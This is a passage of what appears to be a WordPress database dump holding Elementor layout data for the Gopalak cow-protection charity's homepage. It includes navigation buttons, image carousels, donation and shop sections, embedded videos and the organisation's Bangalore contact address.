r\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11365,1890,'_elementor_page_assets','a:0:{}'),(11367,1891,'_elementor_edit_mode','builder'),(11368,1891,'_elementor_template_type','wp-page'),(11369,1891,'_elementor_version','3.7.8'),(11370,1891,'_wp_page_template','elementor_canvas'),(11371,1891,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 